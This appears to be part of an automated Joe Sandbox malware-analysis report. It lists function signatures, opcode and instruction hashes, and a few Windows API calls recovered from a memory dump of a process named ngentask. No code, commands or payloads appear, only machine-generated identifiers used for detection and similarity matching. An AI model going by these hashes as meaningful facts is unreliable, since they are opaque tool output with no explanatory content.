                                                                                                                      • Opcode Fuzzy Hash: e61ffab149f65f2a36282800bf19c731ff7051e50c0c7c81f964f59a71d42744
                                                                                                                      • Instruction Fuzzy Hash: E9412734E482005BD7219F14F880B6BB7E6EB8D304F24A92EE4C597316C3B9ED41C75A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 62a481f38d6e3f7fb9cc860d6b47c7c8c03f983ebc683065253a008ccc13cf74
                                                                                                                      • Instruction ID: 2e2f1a4e6b9348aa9e644b890a2fd66f03e9966b682800d659288625f5a63310
                                                                                                                      • Opcode Fuzzy Hash: 62a481f38d6e3f7fb9cc860d6b47c7c8c03f983ebc683065253a008ccc13cf74
                                                                                                                      • Instruction Fuzzy Hash: F43132759083108FD320DF14E480B2BBBE5EBC9354F14992EE8C59B351D3798D4ACB9A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 11143ed903d55c081b29aa8ddac220b818a8c328501f0edc796692383fc751be
                                                                                                                      • Instruction ID: 9ca7f75b23475dbba00361bcd5267fab3e01802d4fe443a195772d7f3664adee
                                                                                                                      • Opcode Fuzzy Hash: 11143ed903d55c081b29aa8ddac220b818a8c328501f0edc796692383fc751be
                                                                                                                      • Instruction Fuzzy Hash: C331BBB16082009BD7149F19D880A2BB7E1EFC4359F14493EE999E73D5D339EC42CB4A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 551a38319bcb747577a76c629d3bf974cc28e0aa052f2066d3922482742d8ba9
                                                                                                                      • Instruction ID: 686adc304c1ae320e0c6daf4f9fc5568531569f3015bb1f80b8446df69a0c773
                                                                                                                      • Opcode Fuzzy Hash: 551a38319bcb747577a76c629d3bf974cc28e0aa052f2066d3922482742d8ba9
                                                                                                                      • Instruction Fuzzy Hash: 5731CD75908311CFC3008F28D85126BB7F1EFC6385F058999E8D06B3A0E378E984CB8A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                      • Instruction ID: 5ffa12840469dc731bcb426f7cb35325ba097447bf8290b576edb3a554fe3c13
                                                                                                                      • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                      • Instruction Fuzzy Hash: DD112973A091D40EC32A8D3C8440665BFA34A97634F5953DAF4F89B3D2D626CD8A8359
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 3c2f32ce9bc383ba00d7ed0832d78b484c6060efe00dad96bb9a55ecadd4a8a1
                                                                                                                      • Instruction ID: 47bf9c085548fa84875d00c3c5d65b3e1f87cf2bd146b3f1374b63a54812abd8
                                                                                                                      • Opcode Fuzzy Hash: 3c2f32ce9bc383ba00d7ed0832d78b484c6060efe00dad96bb9a55ecadd4a8a1
                                                                                                                      • Instruction Fuzzy Hash: 8D019EB1F00311A7D620AF19B4C1727B2A86F8570CF58053EE8089B342EBF9EC4486AD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 26ca6e44b68741cae2ba47c105817e80baac913b7d3d3ea5de346e01ce13634b
                                                                                                                      • Instruction ID: 6fd8ed32c65a67e545e30c222b7712cd34344acc3dbbb54f6c8140322037564e
                                                                                                                      • Opcode Fuzzy Hash: 26ca6e44b68741cae2ba47c105817e80baac913b7d3d3ea5de346e01ce13634b
                                                                                                                      • Instruction Fuzzy Hash: BF014935F441040BD7257A15B88067B7766EFCA364F29A43AE0D44731AC279AC128365
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                                                                                                                      • Instruction ID: b7fec47195b87a2ccdeee0d802a3b4902b2ff3332171a4b6b0f7a9ed850d631d
                                                                                                                      • Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                                                                                                                      • Instruction Fuzzy Hash: 88D05B61508661469B648D1D9401577F7F0E9C7711F45655FF781D3254D334DC41C1AD
                                                                                                                      APIs
                                                                                                                      • FindWindowExW.USER32(00000000,?,?,00000000), ref: 0041E1D4
                                                                                                                      • IsWindowEnabled.USER32(00000000), ref: 0041E1EF
                                                                                                                      • IsWindowVisible.USER32(?), ref: 0041E204
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$EnabledFindVisible
                                                                                                                      • String ID: TEk$fw$w
                                                                                                                      • API String ID: 18089171-1650657573
                                                                                                                      • Opcode ID: 802ddc08e65f075a8e6804e72eef4bc9b66d4397e9fbd3a9e5a186ac1f9e9fb1
                                                                                                                      • Instruction ID: 42b8097cafa45b3ab70ac05e9a44b887173912cb8e5f825cefcdd8df64589f78
                                                                                                                      • Opcode Fuzzy Hash: 802ddc08e65f075a8e6804e72eef4bc9b66d4397e9fbd3a9e5a186ac1f9e9fb1
                                                                                                                      • Instruction Fuzzy Hash: CB31F1B995C751DFD3348F24D8507EFB7E4EB8A305F05893CD9899B260DB3488918B86
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MetricsSystem
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4116985748-3916222277
                                                                                                                      • Opcode ID: adefc81e243a333a41284b0ce5c5cd4c262681601008b0a0876e86edf09e69f1
                                                                                                                      • Instruction ID: 444d623a228d729f7ebde6f46af1a76120007dc39f6511e19822679111f862eb
                                                                                                                      • Opcode Fuzzy Hash: adefc81e243a333a41284b0ce5c5cd4c262681601008b0a0876e86edf09e69f1
                                                                                                                      • Instruction Fuzzy Hash: FB318FB4918304DFDB00EF68D985A5EBBF0BB89304F01896DE488DB360D770A949CF96
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearInit
                                                                                                                      • String ID: ^
                                                                                                                      • API String ID: 2610073882-1590793086
                                                                                                                      • Opcode ID: 444702d241a70ce79c783c97807d7e1c73b1ab4471c9fa6b073bd9deb887ac46
                                                                                                                      • Instruction ID: c71001e4ab46b3d10acf56b45298640c99e2cfb66b3cac6edeaa9ee220a5b3da
                                                                                                                      • Opcode Fuzzy Hash: 444702d241a70ce79c783c97807d7e1c73b1ab4471c9fa6b073bd9deb887ac46
                                                                                                                      • Instruction Fuzzy Hash: 2131F760108BC29ED312CB3C8448619FFA17B56224F08879CD5F94BBD2D379A56AC7A2